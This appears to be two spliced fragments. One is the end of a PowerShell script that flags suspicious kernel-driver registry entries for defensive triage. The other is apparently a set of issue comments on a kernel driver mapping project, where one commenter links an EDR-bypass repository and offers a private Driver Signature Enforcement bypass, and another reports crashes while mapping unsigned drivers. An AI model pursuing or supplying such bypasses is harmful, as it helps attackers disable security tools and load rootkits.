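        [string[]] $UserWritableHints = @('\Users\', '\Temp\', '\AppData\', '\OneDrive\')
    )

    $services = Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue
    foreach ($svc in $services) {
        $props = Get-ItemProperty -Path $svc.PSPath -ErrorAction SilentlyContinue
        if ($null -eq $props) { continue }

        # Type 1 = SERVICE_KERNEL_DRIVER; user-mode services and file-system drivers are skipped.
        if ($props.Type -ne 1) { continue }

        $name      = $svc.PSChildName
        $imagePath = [string]$props.ImagePath
        $reasons   = @()

        if ($WatchList -contains $name) {
            $reasons += 'name on watchlist'
        }

        if ([string]::IsNullOrWhiteSpace($imagePath)) {
            # The "reg entry does not specify a driver location" case from the report above.
            $reasons += 'ImagePath missing'
        }
        else {
            foreach ($hint in $UserWritableHints) {
                if ($imagePath -like "*$hint*") {
                    $reasons += "ImagePath under a user-writable path ($hint)"
                    break
                }
            }
            # Normally-installed drivers live under System32\drivers or the DriverStore.
            if ($imagePath -notmatch '(?i)system32\\(drivers|driverstore)') {
                $reasons += 'ImagePath outside System32\drivers'
            }
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Service   = $name
                ImagePath = $imagePath
                Start     = $props.Start
                Reasons   = ($reasons -join '; ')
            }
        }
    }
}

# Run from an elevated shell; cross-check each hit against Sysmon event ID 6
# (driver loaded) records for the same image path.
Find-SuspiciousDriverServices | Format-Table -AutoSize
```

Legitimate boot-start drivers without an ImagePath will also show up, so treat the output as a triage list rather than a verdict.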

Hi.

Unless you're not already aware of https://github.com/ByteWhite1x1/EDR-bypass-disable-PspNotifyEnableMask

I also have a DSE bypass at runtime for Windows 10/11 22H2, if you need it. That's my thank you for the KDU project. It's been really useful with testing.

You just PM me or something if you want a private DSE bypass. As of 09/2023, MS has patched this in the latest Windows 10 Pro 22H2. You need to do the PTE trick to bypass DSE without a BSOD. I don't want to post this information publicly. It's only for those who work hard like you.

Crashes on reading FILE_OBJECT

Hi (me again),

I'm trying to map a driver with the drvmap function. However, my PC blue screens on reading FILE_OBJECT (I assume where it calls ReadKernelVM?). This only happens for one of the drivers I am using, both of them I have compiled and made driverless.
(The other one works perfectly). The driver entry point does not appear to be called before the crash. When I debugged the kernel crash dump in WinDbg with my driver source, it did not reference it in the slightest. Instead it gave the NTSTATUS error "reached breakpoint"?

I read that there is an issue when having vgc installed, so I uninstalled it yet I get the same result.

If you want I can attach a copy of the driver I am trying to map. I have tried providers 1 and 2 and concluded after it crashing on both of them that it was independent of that.

Thanks
